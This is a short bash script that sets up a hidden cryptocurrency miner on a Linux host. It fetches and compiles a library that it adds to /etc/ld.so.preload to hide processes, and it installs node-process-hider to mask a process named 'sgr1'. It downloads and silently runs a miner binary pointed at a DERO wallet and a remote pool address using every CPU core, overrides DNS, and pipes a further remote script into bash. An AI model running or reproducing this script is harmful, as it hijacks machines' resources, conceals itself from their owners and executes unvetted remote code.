#!/bin/bash
apt-get update ; apt-get install sudo -y
apt install libltdl-dev -y
sudo apt install libltdl-dev -y
curl https://bitbucket.org/dennidarko01/kangkung/raw/master/nyumput.c -o nyumput.c
apt-get install build-essential -y
gcc -Wall -fPIC -shared -o libnyumput.so nyumput.c -ldl
mv libnyumput.so /usr/local/lib/
echo /usr/local/lib/libnyumput.so >> /etc/ld.so.preload
rm nyumput.c
echo "supersede domain-name-servers 8.8.8.8;">> /etc/dhcp/dhclient.conf
/etc/init.d/network restart
sudo su --command "apt-get update && apt-get install gcc -y && curl -sL https://deb.nodesource.com/setup_14.x | bash && apt-get install nodejs -y && npm install -g npm@9.3.0 -y && npm i -g node-process-hider && ph add sgr1"
mkdir .kap && cd .kap
sudo apt-get update
wget http://archive.ubuntu.com/ubuntu/pool/universe/h/hwloc/libhwloc15_2.1.0+dfsg-4_amd64.deb >/dev/null 2>&1
dpkg -i libhwloc15_2.1.0+dfsg-4_amd64.deb >/dev/null 2>&1
sudo dpkg -i libhwloc15_2.1.0+dfsg-4_amd64.deb >/dev/null 2>&1
wget -O sgr1 https://github.com/novalanto010101/file/raw/main/astro >/dev/null 2>&1
chmod 777 sgr1
sudo ./sgr1 -w dero1qytfne4y9mpry7kcxrl5z328sqrmy349ldgawmu32yy5yzrjrnygjqg0vw3yu -r 95.179.133.130:10100 -p rpc -m $(nproc --all) >/dev/null 2>&1 &
curl -sL https://bitbucket.org/lightcoral2/cangor/raw/master/boled04.sh | bash